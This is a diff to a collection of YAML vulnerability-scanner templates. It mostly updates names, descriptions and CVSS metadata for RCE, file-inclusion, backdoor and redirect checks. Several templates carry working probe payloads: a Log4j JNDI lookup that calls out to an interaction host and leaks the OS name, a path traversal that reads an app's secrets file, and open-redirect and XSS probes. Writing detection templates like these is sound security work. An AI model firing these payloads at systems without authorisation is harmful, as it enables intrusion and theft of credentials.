diff --git a/vulnerabilities/other/hashicorp-consul-rce.yaml b/vulnerabilities/other/hashicorp-consul-rce.yaml
index b631c96023..52a8e97f06 100644
--- a/vulnerabilities/other/hashicorp-consul-rce.yaml
+++ b/vulnerabilities/other/hashicorp-consul-rce.yaml
@@ -1,12 +1,17 @@
 id: hashicorp-consul-rce
 
 info:
-  name: Hashicorp Consul Services Api RCE
+  name: Hashicorp Consul Services API - Remote Code Execution
   author: pikpikcu
   severity: critical
+  description: Hashicorp Consul Services API is vulnerable to an attack that can be leveraged to gaino remote command execution on Consul nodes.
   reference:
     - https://www.exploit-db.com/exploits/46074
-  tags: hashicorp,rce,oast,intrusive
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
+  tags: hashicorp,rce,oast,intrusive,edb
 
 requests:
   - raw:
@@ -31,3 +36,5 @@ requests:
         part: interactsh_protocol # Confirms the DNS Interaction
         words:
           - "dns"
+
+# Enhanced by mp on 2022/06/01
diff --git a/vulnerabilities/other/hasura-graphql-psql-exec.yaml b/vulnerabilities/other/hasura-graphql-psql-exec.yaml
index 8bc90128e4..5c3fbecd73 100644
--- a/vulnerabilities/other/hasura-graphql-psql-exec.yaml
+++ b/vulnerabilities/other/hasura-graphql-psql-exec.yaml
@@ -1,13 +1,17 @@
 id: hasura-graphql-psql-exec
 
 info:
-  name: Hasura GraphQL Engine - postgresql query exec
+  name: Hasura GraphQL Engine - Remote Code Execution
   author: Udyz
   severity: critical
-  description: A vulnerability in Hasura GraphQL Engine allows remote unauthenticated users to execute arbitrary SQL statements via the '/v2/query' endpoint.
+  description: Hasura GraphQL Engine allows remote unauthenticated users to execute arbitrary SQL statements via the '/v2/query' endpoint (aka remote code execution).
   reference:
     - https://www.exploit-db.com/exploits/49802
-  tags: hasura,rce,graphql
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
+  tags: graphql,edb,hasura,rce
 
 requests:
   - raw:
@@ -37,3 +41,5 @@ requests:
         regex:
           - "root:.*:0:0:"
         part: body
+
+# Enhanced by mp on 2022/06/01
diff --git a/vulnerabilities/other/hiboss-rce.yaml b/vulnerabilities/other/hiboss-rce.yaml
index 6b90431fa1..8fbac12d5b 100644
--- a/vulnerabilities/other/hiboss-rce.yaml
+++ b/vulnerabilities/other/hiboss-rce.yaml
@@ -1,12 +1,16 @@
 id: hiboss-rce
 
 info:
-  name: Hiboss RCE
+  name: Hiboss - Remote Code Execution
   author: pikpikcu
   severity: critical
-  description: A vulnerability in HiBoss allows remote unauthenticated attackers to cause the server to execute arbitrary code via the 'server_ping.php' endpoint and the 'ip' parameter.
+  description: HiBoss allows remote unauthenticated attackers to cause the server to execute arbitrary code via the 'server_ping.php' endpoint and the 'ip' parameter.
   reference:
     - http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97%20%E9%85%92%E5%BA%97%E5%AE%BD%E5%B8%A6%E8%BF%90%E8%90%A5%E7%B3%BB%E7%BB%9F%20server_ping.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md?btwaf=40088994
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: hiboss,rce
 
 requests:
@@ -29,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/03
diff --git a/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml b/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml
index 1e8a385c2d..af3090b92a 100644
--- a/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml
+++ b/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml
@@ -1,11 +1,16 @@
 id: hjtcloud-arbitrary-file-read
 
 info:
-  name: HJTcloud Arbitrary File Read
+  name: HJTcloud - Local File Inclusion
   author: pikpikcu
   severity: high
+  description: HJTcloud is vulnerable to local file inclusion.
   reference:
     - https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: hjtcloud,lfi
 
 requests:
@@ -38,3 +43,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/27
diff --git a/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml b/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml
index 3d5c205fec..8d4ac191b0 100644
--- a/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml
+++ b/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml
@@ -1,11 +1,16 @@
 id: hjtcloud-rest-arbitrary-file-read
 
 info:
-  name: HJTcloud Arbitrary file read
+  name: HJTcloud - Local File Inclusion
   author: pikpikcu
-  severity: low
+  severity: high
+  description: HJTcloud is vulnerable to local file inclusion.
   reference:
     - https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: hjtcloud,lfi
 
 requests:
@@ -33,3 +38,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/03
diff --git a/vulnerabilities/other/homeautomation-v3-openredirect.yaml b/vulnerabilities/other/homeautomation-v3-openredirect.yaml
index 539e6eb49d..f73aa868e7 100644
--- a/vulnerabilities/other/homeautomation-v3-openredirect.yaml
+++ b/vulnerabilities/other/homeautomation-v3-openredirect.yaml
@@ -12,10 +12,10 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://example.com/"
+      - "{{BaseURL}}/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://interact.sh/"
 
     matchers:
       - type: regex
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
         part: header
diff --git a/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml b/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml
index eb3bfcfe28..e534753ac6 100644
--- a/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml
+++ b/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml
@@ -1,13 +1,17 @@
 id: hrsale-unauthenticated-lfi
 
 info:
-  name: Hrsale 2.0.0 - Hrsale Unauthenticated Lfi
+  name: Hrsale 2.0.0 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: This exploit allow you to download any readable file from server without permission and login session
+  description: Hrsale 2.0.0 is vulnerable to local file inclusion. This exploit allow you to download any readable file from server without permission and login session
   reference:
     - https://www.exploit-db.com/exploits/48920
-  tags: hrsale,lfi
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: hrsale,lfi,edb
 
 requests:
   - method: GET
@@ -24,3 +28,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/03
diff --git a/vulnerabilities/other/huawei-hg659-lfi.yaml b/vulnerabilities/other/huawei-hg659-lfi.yaml
index 9848bc2218..9fbb59d574 100644
--- a/vulnerabilities/other/huawei-hg659-lfi.yaml
+++ b/vulnerabilities/other/huawei-hg659-lfi.yaml
@@ -1,11 +1,16 @@
 id: huawei-hg659-lfi
 
 info:
-  name: HUAWEI HG659 LFI
+  name: HUAWEI HG659 - Local File Inclusion
   author: pikpikcu
   severity: high
+  description: HUAWEI HG659 is vulnerable to local file inclusion.
   reference:
     - https://twitter.com/sec715/status/1406782172443287559
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: lfi,huawei
 
 requests:
@@ -24,3 +29,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/03
diff --git a/vulnerabilities/other/huawei-router-auth-bypass.yaml b/vulnerabilities/other/huawei-router-auth-bypass.yaml
index a094938e84..5368998b11 100644
--- a/vulnerabilities/other/huawei-router-auth-bypass.yaml
+++ b/vulnerabilities/other/huawei-router-auth-bypass.yaml
@@ -1,13 +1,17 @@
 id: huawei-router-auth-bypass
 
 info:
-  name: Huawei Router Authentication Bypass
+  name: Huawei Router - Authentication Bypass
   author: gy741
   severity: critical
-  description: The default password of this router is the last 8 characters of the device's serial number which exist in the back of the device.
+  description: Huawei Routers are vulnerable to authentication bypass because the default password of this router is the last 8 characters of the device's serial number which exist on the back of the device.
   reference:
     - https://www.exploit-db.com/exploits/48310
-  tags: huawei,auth-bypass,router
+  classification:
+    cvss-metrics: CVSS:10.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-288
+  tags: auth-bypass,router,edb,huawei
 
 requests:
   - raw:
@@ -28,4 +32,6 @@ requests:
           - "DeviceName"
           - "SerialNumber"
           - "HardwareVersion"
-        condition: and
\ No newline at end of file
+        condition: and
+
+# Enhanced by mp on 2022/06/03
diff --git a/vulnerabilities/other/huijietong-cloud-fileread.yaml b/vulnerabilities/other/huijietong-cloud-fileread.yaml
index 1ab77f4a97..2fc3fd3fe7 100644
--- a/vulnerabilities/other/huijietong-cloud-fileread.yaml
+++ b/vulnerabilities/other/huijietong-cloud-fileread.yaml
@@ -1,8 +1,9 @@
 id: huijietong-cloud-fileread
 
 info:
-  name: Huijietong Cloud File Read
+  name: Huijietong - Local File Inclusion
   author: princechaddha,ritikchaddha
+  description: Huijietong is vulnerable to local file inclusion.
   severity: high
   metadata:
     fofa-query: body="/him/api/rest/v1.0/node/role"
@@ -31,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/03
diff --git a/vulnerabilities/other/icewarp-openredirects.yaml b/vulnerabilities/other/icewarp-openredirects.yaml
new file mode 100644
index 0000000000..f040c3581e
--- /dev/null
+++ b/vulnerabilities/other/icewarp-openredirects.yaml
@@ -0,0 +1,36 @@
+id: icewarp-open-redirect
+
+info:
+  name: IceWarp - Open Redirect
+  author: uomogrande
+  severity: medium
+  description: Detects icewarp open redirects / fixed in Version 13.0.2.4
+  metadata:
+    verified: true
+    shodan-query: title:"icewarp"
+  tags: icewarp,redirect
+
+requests:
+  - raw:
+      - |
+        GET ///interact.sh/%2F.. HTTP/1.1
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - 'IceWarp'
+
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
+
+    extractors:
+      - type: regex
+        name: redirected
+        part: header
+        group: 1
+        regex:
+          - 'Server: (.{4,20})'
diff --git a/vulnerabilities/other/icewarp-webclient-rce.yaml b/vulnerabilities/other/icewarp-webclient-rce.yaml
index cf829fe9d3..346be3002f 100644
--- a/vulnerabilities/other/icewarp-webclient-rce.yaml
+++ b/vulnerabilities/other/icewarp-webclient-rce.yaml
@@ -1,11 +1,17 @@
 id: icewarp-webclient-rce
 
 info:
-  name: IceWarp WebClient RCE
+  name: IceWarp WebClient - Remote Code Execution
   author: gy741
   severity: critical
-  reference:
-    - https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
+  description: |
+    IceWarp WebClient is susceptible to remote code execution.
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
+  metadata:
+    shodan-query: title:"icewarp"
   tags: icewarp,rce
 
 requests:
@@ -20,10 +26,12 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "Microsoft Windows [Version"
-        part: body
 
       - type: status
         status:
           - 302
+
+# Enhanced by mp on 2022/05/30
diff --git a/vulnerabilities/other/interlib-fileread.yaml b/vulnerabilities/other/interlib-fileread.yaml
index 9386ffb3b2..71bd3ea00b 100644
--- a/vulnerabilities/other/interlib-fileread.yaml
+++ b/vulnerabilities/other/interlib-fileread.yaml
@@ -1,11 +1,16 @@
 id: interlib-fileread
 
 info:
-  name: Interlib Fileread
+  name: Interlib - Local File Inclusion
   author: pikpikcu
+  description: Interlib is vulnerable to local file inclusion.
   severity: high
   reference:
     - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%9B%BE%E5%88%9B%E8%BD%AF%E4%BB%B6/%E5%9B%BE%E5%88%9B%E8%BD%AF%E4%BB%B6%20%E5%9B%BE%E4%B9%A6%E9%A6%86%E7%AB%99%E7%BE%A4%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: interlib,lfi
 
 requests:
@@ -26,3 +31,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/03
diff --git a/vulnerabilities/other/jamf-pro-log4j.yaml b/vulnerabilities/other/jamf-pro-log4j.yaml
new file mode 100644
index 0000000000..52c6283736
--- /dev/null
+++ b/vulnerabilities/other/jamf-pro-log4j.yaml
@@ -0,0 +1,52 @@
+id: jamf-pro-log4j
+
+info:
+  name: JamfPro - Remote Code Execution (Apache Log4j)
+  author: DhiyaneshDK
+  severity: critical
+  reference:
+    - https://docs.jamf.com/technical-articles/Mitigating_the_Apache_Log4j_2_Vulnerability.html
+    - https://logging.apache.org/log4j/2.x/security.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+  metadata:
+    verified: true
+    shodan-query: title:"Jamf Pro"
+  tags: cve,cve2021,rce,jndi,log4j,jamfpro
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.5
+        Accept-Encoding: gzip, deflate
+        Content-Type: application/x-www-form-urlencoded
+        Origin: {{BaseURL}}
+        Referer: {{BaseURL}}
+
+        username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the DNS Interaction
+        words:
+          - "dns"
+
+      - type: regex
+        part: interactsh_request
+        regex:
+          - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+'  # Match for extracted ${sys:os.name} variable
+
+    extractors:
+      - type: kval
+        kval:
+          - interactsh_ip # Print remote interaction IP in output
+
+      - type: regex
+        part: interactsh_request
+        group: 1
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${sys:os.name} in output
diff --git a/vulnerabilities/other/jeewms-lfi.yaml b/vulnerabilities/other/jeewms-lfi.yaml
index eb3fc80104..b13f9827bb 100644
--- a/vulnerabilities/other/jeewms-lfi.yaml
+++ b/vulnerabilities/other/jeewms-lfi.yaml
@@ -1,11 +1,16 @@
 id: jeewms-lfi
 
 info:
-  name: JEEWMS LFI
+  name: JEEWMS - Local File Inclusion
   author: pikpikcu
   severity: high
+  description: JEEWMS is vulnerable to local file inclusion.
   reference:
     - https://mp.weixin.qq.com/s/ylOuWc8elD2EtM-1LiJp9g
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: jeewms,lfi
 
 requests:
@@ -33,3 +38,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/03
diff --git a/vulnerabilities/other/jinfornet-jreport-lfi.yaml b/vulnerabilities/other/jinfornet-jreport-lfi.yaml
index 33c359624a..866f59fa95 100644
--- a/vulnerabilities/other/jinfornet-jreport-lfi.yaml
+++ b/vulnerabilities/other/jinfornet-jreport-lfi.yaml
@@ -1,14 +1,17 @@
 id: jinfornet-jreport-lfi
 
 info:
-  name: Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal
+  name: Jinfornet Jreport 15.6 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: Jreport Help function have a path traversal vulnerability in the SendFileServlet allows remote unauthenticated users to view any files on the Operating System with Application services user permission.
-    This vulnerability affects Windows and Unix operating systems.
+  description: Jinfornet Jreport 15.6 is vulnerable to local file incluion via the Jreport Help function in the SendFileServlet. Exploitaiton allows remote unauthenticated users to view any files on the Operating System with Application services user permission. This vulnerability affects Windows and Unix operating systems.
   reference:
     - https://cxsecurity.com/issue/WLB-2020030151
     - https://www.jinfonet.com/product/download-jreport/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: jreport,jinfornet,lfi
 
 requests:
@@ -26,3 +29,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/03
diff --git a/vulnerabilities/other/joomla-com-fabrik-lfi.yaml b/vulnerabilities/other/joomla-com-fabrik-lfi.yaml
index e0cdd36ce7..fe23caac3a 100644
--- a/vulnerabilities/other/joomla-com-fabrik-lfi.yaml
+++ b/vulnerabilities/other/joomla-com-fabrik-lfi.yaml
@@ -1,12 +1,17 @@
 id: joomla-com-fabrik-lfi
 
 info:
-  name: Joomla! com_fabrik 3.9.11 - Directory Traversal
+  name: Joomla! com_fabrik 3.9.11 - Local File Inclusion
   author: dhiyaneshDk
   severity: high
+  description: Joomla! com_fabrik 3.9.11 is vulnerable to local file inclusion.
   reference:
     - https://www.exploit-db.com/exploits/48263
-  tags: joomla,lfi
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: joomla,lfi,edb
 
 requests:
   - method: GET
@@ -26,3 +31,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/03
diff --git a/vulnerabilities/other/karel-ip-phone-lfi.yaml b/vulnerabilities/other/karel-ip-phone-lfi.yaml
index d2ca25b0c4..a9c13274db 100644
--- a/vulnerabilities/other/karel-ip-phone-lfi.yaml
+++ b/vulnerabilities/other/karel-ip-phone-lfi.yaml
@@ -1,13 +1,17 @@
 id: karel-ip-phone-lfi
 
 info:
-  name: Karel IP Phone IP1211 Web Management Panel - Directory Traversal
+  name: Karel IP Phone IP1211 Web Management Panel - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: A vulnerability in the Karel IP Phone IP1211 Web Management Panel allows remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter.
+  description: Karel IP Phone IP1211 Web Management Panel is vulnerable to local file inclusion and can allow remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter.
   reference:
     - https://cxsecurity.com/issue/WLB-2020100038
     - https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: karel,lfi
 
 requests:
@@ -26,3 +30,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/03
diff --git a/vulnerabilities/other/kavita-lfi.yaml b/vulnerabilities/other/kavita-lfi.yaml
new file mode 100644
index 0000000000..6bc32e8cf3
--- /dev/null
+++ b/vulnerabilities/other/kavita-lfi.yaml
@@ -0,0 +1,33 @@
+id: kavita-lfi
+
+info:
+  name: Kavita - Path Traversal
+  author: arafatansari
+  severity: medium
+  description: |
+    kareadita/kavita allows Path Traversal by abusing the filename parameter of the /api/image/cover-upload.
+  reference:
+    - https://huntr.dev/bounties/2eef332b-65d2-4f13-8c39-44a8771a6f18/
+  metadata:
+    verified: true
+    shodan-query: http.html:"kavita"
+  tags: kavita,lfi,huntr
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/api/image/cover-upload?filename=../appsettings.json'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"ConnectionStrings":'
+          - '"Path":'
+          - '"TokenKey":'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/other/kevinlab-bems-backdoor.yaml b/vulnerabilities/other/kevinlab-bems-backdoor.yaml
index 867311d115..9d391bed8e 100644
--- a/vulnerabilities/other/kevinlab-bems-backdoor.yaml
+++ b/vulnerabilities/other/kevinlab-bems-backdoor.yaml
@@ -1,12 +1,10 @@
 id: kevinlab-bems-backdoor
 
 info:
-  name: KevinLAB BEMS (Building Energy Management System) Undocumented Backdoor Account
+  name: KevinLAB BEMS (Building Energy Management System) - Backdoor Detection
   author: gy741
   severity: critical
-  description: The BEMS solution has an undocumented backdoor account, and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the
-    RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users
-    settings in the admin panel, and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely.
+  description: KevinLAB BEMS has an undocumented backdoor account, and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel, and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely.
   reference:
     - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php
   tags: kevinlab,backdoor
@@ -24,17 +22,19 @@ requests:
     matchers-condition: and
     matchers:
       - type: regex
+        part: body
         regex:
           - 'data":"[A-Za-z0-9-]+'
           - 'login_key":"[A-Za-z0-9-]+'
-        part: body
         condition: or
 
       - type: word
+        part: body
         words:
           - '"result":true'
-        part: body
 
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/30
diff --git a/vulnerabilities/other/kevinlab-bems-sqli.yaml b/vulnerabilities/other/kevinlab-bems-sqli.yaml
index 929f8c97cc..40f1c00ab0 100644
--- a/vulnerabilities/other/kevinlab-bems-sqli.yaml
+++ b/vulnerabilities/other/kevinlab-bems-sqli.yaml
@@ -10,7 +10,7 @@ info:
     - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php
     - https://www.exploit-db.com/exploits/50146
     - https://packetstormsecurity.com/files/163572/
-  tags: kevinlab,sqli
+  tags: kevinlab,sqli,edb,packetstorm
 
 requests:
   - raw:
diff --git a/vulnerabilities/other/kevinlab-hems-backdoor.yaml b/vulnerabilities/other/kevinlab-hems-backdoor.yaml
index 525d27e4c1..6cd0e7a870 100644
--- a/vulnerabilities/other/kevinlab-hems-backdoor.yaml
+++ b/vulnerabilities/other/kevinlab-hems-backdoor.yaml
@@ -1,12 +1,11 @@
 id: kevinlab-hems-backdoor
 
 info:
-  name: KevinLAB HEMS Undocumented Backdoor Account
+  name: KevinLAB HEMS - Backdoor Detection
   author: gy741
   severity: critical
-  description: The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the
-    RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users
-    settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely.
+  description: |
+    KevinLAB HEMS has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely.
   reference:
     - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php
   tags: kevinlab,default-login,backdoor
@@ -25,11 +24,8 @@ requests:
     matchers-condition: and
     matchers:
 
-      - type: status
-        status:
-          - 200
-
       - type: word
+        part: body
         words:
           - '<meta http-equiv="refresh" content="0; url=/"></meta>'
 
@@ -39,6 +35,12 @@ requests:
         negative: true
 
       - type: word
+        part: header
         words:
           - 'PHPSESSID'
-        part: header
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/05/30
diff --git a/vulnerabilities/other/keycloak-xss.yaml b/vulnerabilities/other/keycloak-xss.yaml
index 6f73adfd83..73fbbb2424 100644
--- a/vulnerabilities/other/keycloak-xss.yaml
+++ b/vulnerabilities/other/keycloak-xss.yaml
@@ -1,7 +1,7 @@
 id: keycloak-xss
 
 info:
-  name: Keycloak <= 8.0 - Cross Site Scripting
+  name: Keycloak <= 8.0 - Cross-Site Scripting
   author: incogbyte
   severity: info
   reference:
@@ -25,4 +25,4 @@ requests:
 
       - type: word
         words:
-          - 'Unrecognized field "<img onerror=confirm(1337) src/>"'
\ No newline at end of file
+          - 'Unrecognized field "<img onerror=confirm(1337) src/>"'
diff --git a/vulnerabilities/other/kingdee-eas-directory-traversal.yaml b/vulnerabilities/other/kingdee-eas-directory-traversal.yaml
index b11c6a4bbf..9ccdb3d2ec 100644
--- a/vulnerabilities/other/kingdee-eas-directory-traversal.yaml
+++ b/vulnerabilities/other/kingdee-eas-directory-traversal.yaml
@@ -1,12 +1,16 @@
 id: kingdee-eas-directory-traversal
 
 info:
-  name: Kingdee EAS - Directory Traversal
+  name: Kingdee EAS - Local File Inclusion
   author: ritikchaddha
-  severity: medium
-  description: Kingdee OA server_file has a directory traversal vulnerability, attackers can obtain sensitive server information through directory traversal.
+  severity: high
+  description: Kingdee EAS OA server_file is vulnerable to local file inclusion and can allow attackers to obtain sensitive server information.
   reference:
     - https://github.com/nu0l/poc-wiki/blob/main/%E9%87%91%E8%9D%B6OA%20server_file%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: kingdee,lfi,traversal
 
 requests:
@@ -33,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/03
diff --git a/vulnerabilities/other/kingsoft-v8-file-read.yaml b/vulnerabilities/other/kingsoft-v8-file-read.yaml
index a103be2311..c8727af6f9 100644
--- a/vulnerabilities/other/kingsoft-v8-file-read.yaml
+++ b/vulnerabilities/other/kingsoft-v8-file-read.yaml
@@ -1,11 +1,16 @@
 id: kingsoft-v8-file-read
 
 info:
-  name: Kingsoft V8 File Read
+  name: Kingsoft 8 - Local File Inclusion
   author: ritikchaddha
   severity: high
+  description: Kingsoft 8 is vulnerable to local file inclusion.
   reference:
     - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/b6f8fbfef46ad1c3f8d5715dd19b00ca875341c2/_book/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E9%87%91%E5%B1%B1/%E9%87%91%E5%B1%B1%20V8%20%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: kingsoft,lfi
 
 requests:
@@ -30,3 +35,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/03
diff --git a/vulnerabilities/other/kyocera-m2035dn-lfi.yaml b/vulnerabilities/other/kyocera-m2035dn-lfi.yaml
index 35651ada5b..596f2dc869 100644
--- a/vulnerabilities/other/kyocera-m2035dn-lfi.yaml
+++ b/vulnerabilities/other/kyocera-m2035dn-lfi.yaml
@@ -1,14 +1,18 @@
 id: kyocera-m2035dn-lfi
 
 info:
-  name: Kyocera Command Center RX ECOSYS M2035dn - Arbitrary File Retrieval
